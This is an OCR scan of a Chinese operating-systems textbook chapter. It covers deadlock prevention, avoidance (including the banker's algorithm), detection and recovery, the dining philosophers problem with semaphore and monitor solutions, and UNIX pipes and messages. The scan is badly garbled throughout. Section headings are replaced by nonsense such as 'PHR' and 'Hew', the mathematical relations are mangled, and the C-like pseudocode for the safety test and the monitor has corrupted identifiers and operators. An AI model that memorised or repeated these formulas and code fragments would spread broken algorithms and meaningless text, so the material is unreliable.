有 几 种 方法 可 以 预防 这 个 条 件 。 首先, 如 果 占 有 某 些 资源 的 一 个 进程 进行 进一步 资源 请 求 被 
拒绝 ， 则 该 进程 必须 释放 它 最 初 占有 的 资源 ， 如 果 有 必要 ， 可 再 次 请 求 这 些 资 源 和 另外 的 资源 。 
另 一 种 方法 是 , 如 果 一 个 进程 请 求 当前 被 男 一 个 进程 占有 的 一 个 资源 , 则 操作 系统 可 以 抢占 另 一 
个 进程 ,要 求 它 释放 资源 。 只 有 在 任意 两 个 进程 的 优先 级 都 不 相同 的 条 件 下 ,后 一 种 方案 才能 预 
防 死 锁 o 

只 有 在 资源 状态 可 以 很 容易 地 保存 和 恢复 的 情况 下 ( 就 像 处 理 器 一 样 ), 这 种 方法 才 是 实用 的 。 


6.2.4 ”循环 等 待 


循环 等 待 条 件 可 以 通过 定义 资源 类 型 的 线性 顺序 来 预防 。 如 果 一 个 进程 已 经 分 配 到 了 R 类 型 
的 资源 ， 那 么 它 接 下 来 请 求 的 资源 只 能 是 那些 排 在 R 类 型 之 后 的 资源 类 型 。 

为 证 明 这 个 策略 的 正确 性 , 给 每 种 资源 类 型 指定 一 个 下 标 。 当 i < JIN, 资源 R 排 在 资源 R 
前 面 。 现 在 假设 两 个 进程 A 和 BM, 原因 是 A 获得 R 并 请 求 R; ,而 B 获得 RARR, W 
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这 个 条 件 是 不 可 能 的 ， 因 为 这 意味 着 < j 并 且 j <i. 
和 占有 且 等 待 的 预防 方法 一 样 , 循环 等 待 的 预防 方法 可 能 是 低 效 的 , 它 会 使 进程 执行 速度 变 
慢 ， 并 且 可 能 在 没有 必要 的 情况 下 拒绝 资源 访问 。 


6.3 PHR 


解决 死 锁 问题 的 另 一 种 方法 是 死 锁 避免 ( deadlock avoidance ), 它 和 死 锁 预防 的 差别 很 微妙 9 。 
在 死 锁 预防 中 , 通过 约束 资源 请 求 , 防止 4 个 死 锁 条 件 中 至 少 一 个 的 发 生 。 这 可 以 通过 防止 发 生 
三 个 必要 策略 条 件 中 的 一 个 ( 互 斥 、 占 有 且 等 待 、 非 抢占 ) 间接 完成 , 也 可 以 通过 防止 循环 等 待 
直接 完成 , 但 这 都 会 导致 低 效 的 资源 使 用 和 低 效 的 进程 执行 。 死 锁 避 免 则 相反 , 它 允 许 三 个 必要 
条 件 , 但 通过 明智 的 选择 , 确保 永远 不 会 到 达 死 锁 点 , 因此 死 锁 避免 比 死 锁 预防 允许 更 多 的 并 发 。 
在 死 锁 避免 中 , 是 否 允 许 当 前 的 资源 分 配 请 求 是 通过 判断 该 请 求 是 否 可 能 导致 死 锁 来 决定 的 。 因 
此 ， 死 锁 避 免 需要 知道 将 来 的 进程 资源 请 求 的 情况 。 

本 节 给 出 了 两 种 死 锁 避 免 的 方法 : 

@ 如 果 一 个 进程 的 请 求 会 导致 死 锁 ， 则 不 启动 此 进程 。 

o 如 果 一 个 进程 增加 的 资源 请 求 会 导致 死 锁 ， 则 不 允许 此 分 配 。 


6.3.1 进程 启动 拒绝 
考虑 一 个 有 着 靖 个 进程 和 闫 种 不 同类 型 的 资源 的 系统 。 定 义 以 下 向 量 和 抢 阵 : 


Resource = R = (R Ra, Rm) 系统 中 每 种 资源 的 总 量 
Available = V= (Vi, Va. >, Vm) 未 分 配给 进程 的 每 种 资源 的 总 量 
Ci Cz Cim 
Claim = C i Ca ° C, -进程 1 对 资源 j 的 需求 
Cu Cn 有 Com 
Ay A2 > Am 


Allocation = 中 名 T fam Ay = 当前 分 配给 进程 i 的 资源 j 





Am Am ` Anm 


和 矩阵 Claim 给 出 了 每 个 进程 对 每 种 资源 的 最 大 需求 , 其 中 每 一 行 表示 一 个 进程 对 所 有 资源 的 
请 求 。 为 了 使 死 锁 避 人 免 正常 工作 ， 这 个 和 矩阵 信息 必须 由 进程 事先 声明 。 类 似 地 ， 和 矩阵 Allocation 
显示 了 每 个 进程 当前 的 资源 分 配 情况 。 从 中 可 以 看 出 以 下 关系 成 立 : 


1) R= 434, SA ”所 有 资源 或 者 可 用 ， 或 者 已 经 被 分 配 。 
i=l 


2) GSR, 对 所 有 i、j 任何 一 个 进程 对 任何 一 种 资源 的 请 求 都 不 能 超过 系统 中 该 
种 资源 的 总 量 。 
3) SC, WAAL j 分 配给 任何 一 个 进程 的 任何 一 种 资源 都 不 会 超过 该 进程 最 
初 声明 的 此 资源 的 最 大 请 求 个 数 。 
有 了 这 些 和 矩阵 表达 式 和 关系 式 , 就 可 以 定义 一 个 死 锁 避免 策略 : 如 果 一 个 新 进程 的 资源 需求 
会 导致 死 锁 ， 则 拒绝 启动 这 个 新 进程 。 仅 当 对 所 有 J 


O 术语 “避免 ”有 一 点 含糊 。 实 际 上 可 以 把 本 节 讨论 的 策略 看 做 是 死 锁 预 防 的 一 个 例子 ， 因 为 它们 确实 防止 了 
死 锁 的 发 生 。 





n 
R; > Coms + Ci 


i=] 


时 才 启 动 一 个 新 进程 Pro 也 就 是 说 ， 只 有 所 有 当前 进程 的 最 大 请 求 量 加 上 新 的 进程 请 求 可 以 满 
足 时 ,， 才 会 肩 动 该 进程 。 这 个 策略 很 难 是 最 优 的 , 因为 它 假设 最 坏 情 况 : 所 有 进程 同时 开始 它们 
的 最 大 请 求 。 


6.3.2 资源 分 配 拒 绝 Animation: Banker’s on, 

资源 分 配 拒绝 策略 ， 又 称 为 银行 家 算法 9s ， 最 初 是 在 [DIJK65] 中 提出 的 。 首 先 需 要 定义 状态 
和 安全 状态 的 概念 。 考 虚 一 个 系统 , 它 有 固定 数 自 的 进程 和 固定 数目 的 资源 , 任何 时 候 一 个 进程 
可 能 分 配 到 零 个 或 多 个 资源 。 系 统 的 状态 是 当前 给 进程 分 配 的 资源 情况 , 因此 , 状态 包含 前 面 定 
义 的 两 个 向 量 Resource 和 Available 以 及 两 个 矩阵 Claim 和 Allocation。 安 全 状态 是 指 至 少 有 一 
个 资源 分 配 序列 不 会 导致 死 锁 ( 即 所 有 进程 都 能 运行 直到 结束 )， 不 安全 状态 当然 就 是 指 一 个 不 
安全 的 状态 。 

下 面 的 例子 说 明了 这 些 概念 。 图 6.7a 显示 了 一 个 含有 4 个 进程 和 3 个 资源 的 系统 的 状态 。 
R1、R2 和 R3 的 资源 总 量 分 别 为 9、3 和 6。 在 当前 状态 下 资源 分 配给 4 个 进程 ，R2 和 R3 BA 
下 1 个 可 用 单元 。 问 题 如 下 : 这 是 安全 状态 吗 ?为 了 回答 这 个 问题 ， 先 提出 一 个 中 间 问 题 : 在 当 
前 的 资源 状况 下 , 在 这 4 个 进程 中 是 否 存在 一 个 可 以 运行 到 结束 的 进程 ? 也 就 是 说 , 可 用 资源 能 
不 能 满足 当前 的 分 配 情况 和 任何 一 个 进程 的 最 大 需求 间 的 差距 ?按照 先前 介绍 的 矩阵 和 向 量 的 概 
念 ， 对 于 进程 i 下 面 的 条 件 应 该 满足 对 所 有 j,Cy- Ay 所 VV。 

显然 ， 这 对 P1 是 不 可 能 的 ， 它 只 拥有 一 个 R1 单元 ， 还 需要 两 个 R1 单元 、 两 个 R2 单元 和 
两 个 R3 单元 。 但 是 ,通过 把 一 个 R3 单元 分 配给 进程 P2，P2 就 拥有 了 它 所 需要 的 最 大 资源 ， 从 
而 可 以 运行 到 结束 。 现 在 假设 这 些 已 经 完成 了 ， 当 P2 结束 后 ， 它 的 资源 回 到 可 用 资源 池 中 ， 结 
果 状 态 如 图 6.7b 所 示 。 现 在 可 以 再 次 询问 其 余 进 程 是 否 可 以 完成 。 在 这 种 情况 下 ， 其 余 进程 都 
是 可 以 完成 的 。 假 设 选择 Pl 运行 ， 分 配给 其 所 需要 的 资源 ， 完 成 P1 的 工作 ,并 把 Pl 的 所 有 资 
源 释 放 回 可 用 资源 池 中 , 此 时 的 状态 如 图 6.7c 所 示 。 下 一 步 , 可 以 完成 P3 的 工作 , 得 到 如 图 6.7d 
所 示 的 状态 。 最 后 ， 可 完成 P4 的 工作 。 此 时 ， 所 有 进程 都 运行 结束 。 因 此 ， 图 6.7a 定义 的 状态 
是 一 个 安全 状态 。 

从 这 些 概念 可 得 出 下 面 的 死 锁 避免 策略 ， 该 策略 能 确保 系统 中 进程 和 资源 总 是 处 于 安全 状 
态 。 当 进程 请 求 一 组 资源 时 ， 假设 同意 该 请 求 ， 从 而 改变 了 系统 的 状态 ， 然 后 确定 其 结果 是 否 还 
处 于 安全 状态 。 如 果 是 , 同意 这 个 请 求 ; 如 果 不 是 , 阻塞 该 进程 直到 同意 该 请 求 后 仍然 是 安全 的 。 

考虑 图 6.8a 定义 的 状态 。 假 设 P2 请 求 另 外 一 个 RI 单元 和 一 个 R3 单元 。 如 果 假 定 同意 该 
请 求 ， 则 结果 的 状态 同 图 6.7a 的 状态 。 由 于 已 经 知道 这 是 一 个 安全 状态 ， 因 此 满足 这 个 请 求 是 
安全 的 。 现 在 回 到 图 6.8a 的 状态 ， 并 假设 Pl 请 求 另 外 一 个 R 单元 和 RI 单元 ， 如 果 假 定 同 意 
该 请 求 ， 则 到 达 图 6.8b 的 状态 。 这 个 状态 安全 吗 ? 答 案 是 否 ， 因 为 每 个 进程 都 至 少 需 要 一 个 另外 
的 RI 单元 ， 但 现在 没有 一 个 可 用 的 。 因 此 ， 基 于 死 锁 避免 的 原则 ，P1 的 请 求 将 被 拒绝 并 且 PI 
将 被 阻塞 。 

但 图 6.8b 并 不 是 一 个 死 锁 状态 ， 它 仅仅 有 死 锁 的 可 能 ， 这 一 点 是 很 重要 的 。 例 如 ， 如 果 PI 


© Dijkstra 使 用 这 个 名 字 是 因为 这 个 问题 类 似 于 银行 业务 。 想 从 银行 借 钱 的 顾客 对 应 于 进程 , 借 出 的 钱 对 应 于 资 
源 。 作 为 银行 业务 问题 ， 银 行 可 以 借 出 的 钱 有 限 ， 每 个 顾客 都 有 一 定 的 银行 信用 额 。 顾 客 可 以 选择 借 一 部 分 ， 
但 不 能 保证 顾客 在 取 走 大 量 贷款 后 一 定 能 偿还 。 可 如 果 银 行 有 风险 ,没有 足够 的 基金 提供 更 多 的 贷款 让 顾客 
最 后 偿还 ， 则 银行 家 会 拒绝 贷款 给 顾客 。 
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从 这 个 状态 开始 运行 ， 先 释放 一 个 R 单元 和 一 个 R3 单元 ， 后 来 又 再 次 需要 这 些 资源 ， 则 一 旦 
这 样 做 ， 系 统 将 到 达 一 个 安全 状态 。 因 此 ， 死 锁 避 免 策略 并 不 能 确切 地 预测 死 锁 ， 它 仅仅 是 预料 
死 锁 的 可 能 性 并 确保 永远 不 会 出 现 这 种 可 能 性 。 
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d) P3 运行 到 完成 
图 6.7 安全 状态 的 确定 


图 6.9 给 出 了 对 死 锁 避免 逻辑 的 一 个 抽象 描述 ， 图 6.9b 中 为 算法 的 主体 。 数据 结构 state 
定义 了 系统 状态 ，request [+] 是 一 个 向 量 ,定义 了 进程 i 的 资源 请 求 。 首 先 ， 进 行 一 次 检测 ， 确 保 该 
请 求 不 会 超过 进程 最 初 声明 的 要 求 。 如 果 该 请 求 有 效 ， 下 一 步 确 定 是 否 可 能 实现 这 个 请 求 ( 即 有 足够 的 
可 用 资源 )。 如 果 不 可 能 ,: 则 该 进程 被 挂 起 ;如 果 可 能 ， 则 最 后 一 步 是 确定 完成 这 个 请 求 是 否 是 - 
安全 的 。 为 做 到 这 一 点 , 资源 被 暂时 分 配给 进程 i 以 形成 一 个 newstate, 然后 使 用 图 6.9c 中 的 
算法 测试 安全 性 。 
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Available 向量 V 
b) RI 请求 1 个 R1 单元 和 1 个 R3 单元 
6.8 ” 非 安 全 状态 的 确定 


Resource 向 量 R 


struct state { 
int resource[m}; 
int available[{m}; 
int claim{n){m}; 
int alloo{n)[m)}; 





a) 全 局 数据 结构 


iť (alloc [i,*] + request {*) > claim (i,*]) 
< error >; /* 总 申请 最大 于 需求 */ 
else if (request [+] > available [*)) 
< suspend process >; 
else { /* 模拟 分 配 */ 
< define newstate by: 
alloc (i,*} = allee [4,*] + request {*}) 
available [*) = available [*] 一 request {*] >; 


} 
if (safe (newstata)) 
< carry out allocation >; 
else { 
< restore original state >; 
< suspend process >; 
二 


b) 资源 分 配 算法 


boolean safe (state 9) { 
int currentavail(m); 
process rest[<number of processes>}; 
currentavail = available; 
rest = {all processes); 
possible = true; 
while (possible) { 
<find a process Py in rest such that 
claim [k,*] — alloc [k,*) <= ourrentavail;> 
if (found) + /* 模 氛 3Bx ATT +/ 
earrentavail = currentavail + alloc [k,*]; 
reat = rest - {Px}; 


} 
else possible = false; 


teins (rest =~ nell); 
c) 测试 安全 算法 〔 银行 家 算法 ) 
图 6.9 死 锁 避免 逻辑 
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死 锁 避免 的 优点 是 它 不 需要 死 锁 预 防 中 的 抢占 和 辐 滚 进程 ,并 且 比 死 锁 预防 的 限制 少 。 但 是 ， 
它 在 使 用 中 也 有 许多 限制 : 
@ 必须 事先 声明 每 个 进程 请 求 的 最 大 资源 。 
@ 考虑 的 进程 必须 是 无 关 的 ， 也 就 是 说 ， 它 们 执行 的 顺序 必须 没有 任何 同步 要 求 的 限制 。 
@ 分 配 的 资源 数目 必须 是 固定 的 。 
@ 在 占有 资源 时 ， 进 程 不 能 退出 。 


6.4 Hew 
死 锁 预防 策略 是 非常 保守 的 ， 它 们 通过 限制 访问 资源 和 在 进程 上 强加 约束 来 解决 死 锁 问题 。 
死 锁 检 测 策 略 则 完全 相反 ， 它 不 限制 资源 访问 或 约束 进程 行为 。 对 于 死 锁 检 测 ( deadlock 


detection) 来 说 ， 只 要 有 可 能 ， 被 请 求 的 资源 就 被 授权 给 进程 。 操 作 系统 周期 性 地 执行 一 个 算法 
检测 前 面 的 条 件 4， 即 图 6.6 中 描述 的 循环 等 待 条 件 。 


6.4.1 死 锁 检测 算法 


死 锁 的 检查 可 以 非常 频繁 地 在 每 个 资源 请 求 时 进行 , 也 可 以 进行 得 少 一 些 , 具体 取决 于 发 生 
死 锁 的 可 能 性 。 在 每 次 资源 请 求 时 检查 死 锁 有 两 个 好 处 : 它 使 得 可 以 尽早 地 检测 死 锁 情况 ,并 且 
由 于 此 方法 基于 系统 状态 的 逐渐 变化 情况 ,因而 算法 相对 比较 简单 。 另 一 方面 ,这 种 频繁 的 检查 
会 耗费 相当 多 的 处 理 器 时 间 。 
死 锁 检 测 的 一 个 常见 算法 是 [COFF71] 中 撒 述 的 算法 ， 它 使 用 了 上 一 节 中 定义 的 Allocation 矩阵 
和 Available 向 量 。 此 外 ,还 定义 了 一 个 请 求 矩 阵 CQ， 其 中 oO 表示 进程 ;请 求 的 类 型 j 的 资源 量 。 算 
法 主要 是 一 个 标记 没有 死 锁 的 进程 的 过 程 。 最 初 ， 所 有 的 进程 都 是 未 标记 的 ， 然 后 执行 下 列 步 又 ， 
1) 标记 Allocation 矩阵 中 一 行 全 为 零 的 进程 。 
2) 初始 化 一 个 临时 向 量 Ww, SEES Available 向 量 。 
3) 查找 下 标 i， 使 进程 i 当前 未 标记 且 @ 的 第 i 行 小 于 等 于 wW, PHRA 1<K<m, 
Qi 夸 WWe。 如 果 找 不 到 这 样 的 行 ， 终止 算 法 。 | 
4) 如 果 找 到 这 样 的 行 ， 标 记 进 程 :， 并 把 Allocation 矩阵 中 的 相应 行 加 到 万 中 ， 也 就 是 说 ， 
对 所 有 的 Skam, $ 所 = 下 十 4i4。 返 回 步骤 3 )。 
当 且 仅 当 算法 的 最 后 结果 有 未 标记 的 进程 时 存在 死 锁 , 每 个 未 标记 的 进程 都 是 死 锁 的 。 算法 
的 策略 是 查找 一 个 进程 , 使 得 可 用 资源 可 以 满足 该 进程 的 资源 请 求 ， 然 后 假设 同意 这 些 资源 , 让 
该 进程 运行 直到 结束 ， 再 释放 它 的 所 有 资源 。 然 后 算法 再 寻找 另 一 个 可 以 满足 资源 请 求 的 进程 。 
注意 , 这 个 算法 不 能 保证 可 以 防止 死 锁 ， 这 要 取决 于 将 来 同意 请 求 的 次 序 , 它 所 做 的 一 切 是 确定 
当前 是 否 存在 死 锁 。 
可 以 用 图 6.10 来 说 明 这 个 死 锁 检测 算法 。 算 法 如 下 进行 : 
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图 6.10 ” 充 锁 检测 的 例子 
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1) 由 于 P4 没有 已 分 配 的 资源 ， 标 记 P4。 

2) > W=(00001), 

3) 进程 P3 的 请 求 小 于 或 等 于 W, AERE P3 ， 并 令 W=W+ (00010) = (00011), 
4) 没有 其 他 未 标记 的 进程 在 @ 中 的 行 小 于 或 等 于 W, AKKERS. 

算法 的 结果 是 Pl 和 P2 未 标记 ， 表 示 这 两 个 进程 是 死 锁 的 。 


6.4.2 WE 


一 旦 检测 到 死 锁 ， 就 需要 某 种 策略 以 恢复 死 锁 。 下 面 按 复杂 度 递 增 的 顺序 列 出 可 能 的 方法 : 

1) 取消 所 有 的 死 锁 进程 。 不 管 怎样 ， 这 是 操作 系统 中 最 常 采用 的 方法 。 

2 ) 把 每 个 死 锁 进 程 回 滚 到 前 面 定 义 的 某 些 检查 点 ， 并 且 重 新 启动 所 有 进程 。 这 要 求 在 系统 
中 构造 回 深 和 重启 机 制 。 该 方法 的 风险 是 原来 的 死 锁 可 能 再 次 发 生 。 但 是 ， 并 发 进程 的 
不 确定 性 通常 能 保证 不 会 发 生 这 种 情况 。 

3) 连续 取消 死 锁 进程 直到 不 再 存在 死 锁 。 选 择 取 消 进程 的 顺序 基于 某 种 最 小 代价 原则 。 在 
每 次 取消 后 ， 必 须 重 新 调用 检测 算法 ， 以 测试 是 否 仍 存 在 死 锁 。 

4) 连续 抢占 资源 直到 不 再 存在 死 锁 。 和 3 ) 一 样 ， 需 要 使 用 一 种 基于 代价 的 选择 方法 ， 并 
且 需 要 在 每 次 抢占 后 重新 调用 检测 算法 。 一 个 资源 被 抢占 的 进程 必须 回 滚 到 获得 这 个 资 
源 之 前 的 某 一 状态 。 

对 于 3) 和 4)， 选 择 原则 可 采用 下 面 中 的 一 种 : 

o 目前 为 止 消耗 的 处 理 器 时 间 最 少 。 

@ 目前 为 止 产 生 的 输出 最 少 。 

© 预计 剩 下 的 时 间 最 长 。 

@ 目前 为 止 分 配 的 资源 总 量 最 少 。 

@ 优先 级 最 低 。 

这 些 原则 中 有 一 些 比 其 他 的 更 易于 衡量 , 预计 剩 下 的 时 间 蚌 最 值得 怀疑 的 。 再 者 , 除了 衡量 

优先 级 外 ， 对 用 户 没 有 任何 成 本 可 言 ， 这 里 指 的 是 对 整个 系统 的 成 本 。 


6.5 一 种 综合 的 死 锁 策略 


从 表 6.1 中 可 见 , 所 有 的 解决 死 锁 的 策略 都 各 有 其 优 缺点 。 与 其 将 操作 系统 机 制 设 计 为 只 采 
用 其 中 一 种 策略 ， 还 不 如 在 不 同情 况 下 使 用 不 同 的 策略 更 有 效 。[HOWA73] 提 出 了 一 种 方法 : 
@ 把 资源 分 成 几 组 不 同 的 资源 类 。 
@ 为 预防 在 资源 类 之 间 由 于 循环 等 待产 生死 锁 ， 可 使 用 前 面 定义 的 线性 排序 策略 。 
@ 在 一 个 资源 类 中 ， 使 用 该 类 资源 最 适合 的 算法 。 
作为 该 技术 的 一 个 例子 ， 考 虑 下 列 资 源 类 : 
@ 可 交换 空间 : 在 进程 交换 中 所 使 用 的 外 存 中 的 存储 块 。 
@ 进程 资源 : 可 分 配 的 设备 ， 如 磁带 设备 和 文件 。 
@ 内 存 : 可 以 按 页 或 按 段 分 配给 进程 。 
@ 内 部 资源 : 诸如 IO 通道 。 
前 面 列 出 的 次 序 表示 了 资源 分 配 的 次 序 。 考 虑 到 一 个 进程 在 其 生命 周期 中 的 步骤 顺序 , 这 个 
次 序 是 最 合理 的 。 在 每 一 类 中 ， 可 采用 以 下 策略 ; 
@ 可 交换 空间 : 通过 要 求 一 次 性 分 配 所 有 请 求 的 资源 来 预防 死 锁 ， 就 像 占 有 且 等 待 预防 策 
略 一 样 。 如 果 知 道 最 大 存储 需求 (通常 情况 下 都 知道 )， 则 这 个 策略 是 合理 的 。 死 锁 避 免 
也 是 可 能 的 。 
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© 进程 资源 ， 对 这 类 资源 ， 死 锁 避免 策略 常常 是 很 有 效 的 ， 这 是 因为 进程 可 以 事先 声明 它 
们 将 需要 的 这 类 资源 。 采 用 资源 排序 的 预防 策略 也 是 可 能 的 。 

@ AF: 对 于 内 存 ， 基 于 抢占 的 预防 是 最 适合 的 策略 。 当 一 个 进程 被 抢占 后 ， 它 仅仅 被 换 
到 外 存 ， 释 放空 间 以 解决 死 锁 。 

@ 内 部 资源 : 可 以 使 用 基于 资源 排序 的 预防 策略 。 


6.6 哲学 家 就 餐 问题 


现在 来 考虑 Dijkstra[DUJK71] 引 入 的 哲学 家 就 餐 问 题 。 有 5 位 哲学 家 住 在 一 座 房子 里 ， 在 他 
们 的 面前 有 一 张 餐 桌 。 每 位 哲学 家 的 生活 就 是 思考 和 吃饭 。 通 过 多 年 的 思考 , 所 有 的 哲学 家 一 臻 
同意 最 有 助 于 他 们 思考 的 食物 是 意大利 面条 。 由 于 缺乏 手工 技能 , 每 位 哲学 家 需要 两 把 叉子 来 吃 
意大利 面条 。 

吃饭 的 布置 很 简单 ， 如 图 6.11 所 示 : 一 个 圆桌 上 有 一 大 碗 
面 ，5 个 盘子 , 每 位 哲学 家 一 个 , 还 有 5 把 叉子。 每 个 想 吃饭 的 
哲学 家 将 坐 到 桌子 旁 分 配给 他 的 位 置 上 ,使 用 盘子 两 侧 的 又 子 ， 
取 面 和 吃 面 。 问 题 是 : 设计 一 个 礼仪 (算法 ) 以 允许 哲学 家 上 旋 
饭 。 算 法 必须 保证 互 斥 ( 没有 两 位 哲学 家 同时 使 用 同一 把 叉子 )， 
同时 还 要 避免 死 锁 和 饥 狐 〈 此 时 ， 该 术语 的 字面 含义 和 算法 的 
意思 相同 )。 

这 个 问题 本 身 也 许 并 不 重要 ， 但 它 确实 说 明了 死 锁 和 饥饿 
中 的 基本 问题 。 此 外 ， 解 决 方案 的 研究 展现 了 并 发 程序 设计 中 
的 许多 困难 (例如 ， 见 fCING90] )。 另 外 ， 哲 学 家 就 餐 问题 可 以 图 6.11 哲学 家 的 就 餐 布 局 
看 做 是 当 应 用 程序 中 包含 并 发 线程 的 执行 时 ， 协 调处 理 共享 资 源 的 一 个 有 代表 性 的 问题 。 因 此 ， 
该 问题 是 评价 同步 方法 的 一 个 测试 标准 。 


6.6.1 使 用 信号 量 解 决 方案 


图 6.12 给 出 了 使 用 信号 量 的 解决 方案 。 每 位 哲学 家 首先 拿 起 左边 的 叉子 ， 然 后 拿 起 右边 的 
叉子 。 在 哲学 家 吃 完 饭 后 ,这 两 把 叉子 又 被 放 回 桌 子 上 。 这 个 解决 方案 会 导致 死 锁 : 如 果 所 有 的 
哲学 家 在 同一 时 刻 都 感到 饥饿 ,他 们 都 坐 下 来 ,都 拿 起 左边 的 叉子 ,又 都 伸手 拿 右边 的 叉子 , 但 
都 没 拿 到 。 在 这 种 有 损 尊严 的 状态 下 ， 所 有 的 哲学 家 都 会 处 于 饥饿 状态 。 








/* 程序 : yh ye ae a 
semaphore fork [5] = 

int i; 

void philosopher (int i) 


while (true) { 
think(); 
wait (fork[i]); 
wait (fork [(i+1) mod 5]); 
eat(); 
signal(fork [(i+1) mod 5]); 
signal(fork[{i]); 

} 


} 
void main() 


parbegin (philosopher (0), philosopher (1), 
philosopher (2), philosopher (3), 
Philosopher (4)); 

} 





图 6.12 哲学 家 就 餐 问 题 的 第 一 种 解决 方案 
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为 了 避免 死 锁 的 危险 , 可 以 再 另外 买 5 把 叉子 ( 一 个 更 卫生 的 解决 方案 ) 或 者 教会 哲学 家 仅 
用 一 把 又 子 吃 面 。 另 一 种 方法 是 , 考虑 增加 一 位 服务 员 , 他 只 允许 4 位 哲学 家 同时 进入 餐厅 ,由 
于 最 多 有 4 位 哲学 家 就 座 ， 因 而 至 少 有 一 位 哲学 家 可 以 拿 到 两 把 叉子 。 图 6.13 显示 了 这 种 方案 ， 
这 里 再 次 使 用 了 信号 量 。 这 个 方案 不 会 发 生死 锁 和 饥饿 。 


/* 程序 :哲学 家 就 餐 问 题 */ 
semaphore fork(5] = {1}; 
semaphore room = {4}; 
int i; 
void philosopher (int i) 
{ 
while (true) { 
think(); 
wait (room); 
wait (fork[i]}); 
wait (fork [(i+1) mod 5}); 
eat(); 
signal (fork {(i+1) mod 5)); 
signal (fork(i}); 
signal (room); 
} 


} 
void main() 


parbegin (philosopher (0), philosopher (1), philosopher (2), 
philosopher (3), philosopher (4)); 





图 6.13 哲学 家 就 餐 问 题 的 第 二 种 解决 方案 


6.6.2 ”使 用 管 程 解决 方案 


图 6.14 给 出 了 使 用 管 程 解决 哲学 家 就 餐 问 题 的 方案 。 这 种 方案 定义 了 一 个 含有 5 个 条 件 变 
量 的 向 量 , 每 把 叉子 对 应 一 个 条 件 变 量 。 这 些 条 件 变 量 用 来 标示 哲学 家 等 待 的 叉子 可 用 情况 。 另 
外 ， 有 一 个 布尔 向 量 记 录 每 把 叉子 的 使 用 状态 (true 表示 叉子 可 用 )。 管 程 包含 了 两 个 过 程 。 
get_forks 函数 用 于 表示 哲学 家 取 他 /她 左边 和 右边 的 叉子 。 如 果 至 少 有 一 把 叉子 不 可 用 , 那么 
哲学 家 进程 就 会 在 条 件 变 量 的 队列 中 等 待 。 这 可 让 另外 的 哲学 家 进程 进入 到 管 程 。 
release-forks 函数 用 来 表示 两 把 叉子 可 用 。 注 意 ， 这 种 解决 方案 的 结构 和 图 6.12 中 的 信和 号 
量 解决 方案 相似 。 在 这 两 种 方案 中 , 哲学 家 都 是 先 取 左 边 的 叉子 ,然后 取 右 边 的 叉子 。 和 信号 量 
PAHE, 管 程 不 会 发 生死 锁 ， 因为 在 同一 时 刻 只 有 一 个 进程 进入 管 程 。 比 如 ,第 一 位 哲学 家 进 
程 进入 到 管 程 保证 了 只 要 他 拿 起 了 左边 的 叉子 ， 在 他 右边 的 哲学 家 可 以 拿 到 其 左边 的 叉子 之 前 
( 即 这 位 哲学 家 右边 的 叉子 )， 就 一 定 可 以 拿 到 右边 的 叉子 。 


6.7 UNIX 的 并 发 机 制 


UNIX 为 进程 间 的 通信 和 同步 提供 了 各 种 机 制 。 这 里 ， 我 们 只 介绍 最 重要 的 几 种 : 管道 、 消 
息 、 共 享 内 存 、 信 号 量 、 信 号 。 

管道 、 消息 和 共享 内 存 提 供 了 进程 间 传 递 数据 的 方法 , 而 信号 量 和 信号 则 用 于 其 他 进程 的 触 
发 行为 。 
6.7.1 管道 


UNIX 对 操作 系统 开发 最 重要 的 贡献 之 一 是 管道 。 受 协同 程序 [RITC84] 概 念 的 启发 ， 管 道 是 
一 个 环形 缓冲 区 ， 人 允许 两 个 进程 以 生产 者 /消费 者 的 模型 进行 通信 。 因 此 ， 这 是 一 个 先进 先 出 
(FIFO) 队列 ， 由 一 个 进程 写 ， 而 由 另 一 个 进程 读 。 

管道 在 创建 时 获得 一 个 固定 大 小 的 字 节 数 。 当 一 个 进程 试图 往 管道 中 写 时 , 如 果 有 足够 的 空 
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间 , 则 写 请 求 被 立即 执行 ; 否则 该 进程 被 阻塞 。 类 似 地 ， 如 果 一 个 读 进 程 试 图 读 取 多 于 当前 管道 
中 的 字 节 数 时 , 它 也 被 阻塞 ; 否则 读 请 求 被 立即 执行 。 操 作 系统 强制 实施 互 斥 ， 即 一 次 只 能 有 一 
个 进程 可 以 访问 管道 。 


有 两 类 管道 ; 命名 管道 和 匿名 管道 。 只 有 有 “血缘 ”关系 9 的 进程 才 可 以 共享 匿名 管道 ， 而 
不 相关 的 进程 只 能 共享 命名 管道 。 


monitor dining controller; 
cond ForkReady[5]; /* condition variable for synchronization */ 
boolean fork{5] = {true}; /* availability status of each fork */ 


void get forks(int pid) /* pid is the philosopher id number */ 
{ 


int left = pid; 
int right = (++pid) % 5; 
/*grant the left fork*/ 
if (tfork(left) 
owait (ForkReady[left}}; /* queve on condition variable */ 
fork(left) = false; 
/*grant the right fork*/ 
if (tfork(right) 
ewait (ForkReady (right); /* queue on condition variable */ 
fork(right) = false: 


} 
void release_forks(int pid) 
{ 


dnt left = pid; 

int right = (+tpid) % 5; 

/*release the left fork*/ 

if (empty(ForkReady[{left])} /*no one is waiting for this fork */ 
fork(left) = true; 

else /* awaken a process waiting on this fork */ 
csignal (ForkReady[left]); 

/*release the right fork*/ 

if (empty (ForkReady[ right] ) /*no one is waiting for this fork */ 
fork(right) = true; 

else /* awaken a process waiting on this fork */ 
esiqnal(ForkReady[right}); 


void philosopher[k=#0 to 4] /* the five philosopher clients */ 


while (true) { 
<think>; 
get_forks(k); /* client requests two forks via monitor */ 
<eat spaghetti>; 
release_forks(k); /* client releases forks via the monitor */ 





图 6.14 哲学 家 就 餐 问 题 的 管 程 解决 方案 
6.7.2 消息 

消息 是 有 类 型 的 一 段 文本 。UNIX 为 参与 消息 传递 的 进程 提供 msgsna 和 msgrev 系统 调用 。 
每 个 进程 都 有 一 个 与 之 相关 联 的 消息 队列 ， 其 功能 类 似 于 信箱 。 

消息 发 送 者 指定 发 送 的 每 个 消息 的 类 型 , 类 型 可 以 被 接收 者 用 做 选择 的 依据 。 接收 者 可 以 按 
先进 先 出 的 顺序 接收 信息 , 或 者 按 类 型 接收 。 当 进程 试图 给 一 个 满 队列 发 送信 息 时 , 它 将 被 阻塞 ; 
当 进 程 试图 从 一 个 空 队列 读 取 时 也 会 被 阻塞 ; 如 果 一 个 进程 试图 读 取 某 一 特定 类 型 的 消息 , 但 由 
于 现在 还 没有 这 种 类 型 的 消息 而 失败 时 ， 则 该 进程 不 会 阻塞 。 


6.7.3 ENG 


共享 内 存 是 UNIX 提供 的 进程 间 通 信 手 段 中 速度 最 快 的 一 种 。 这 是 虚 存 中 由 多 个 进程 共享 的 
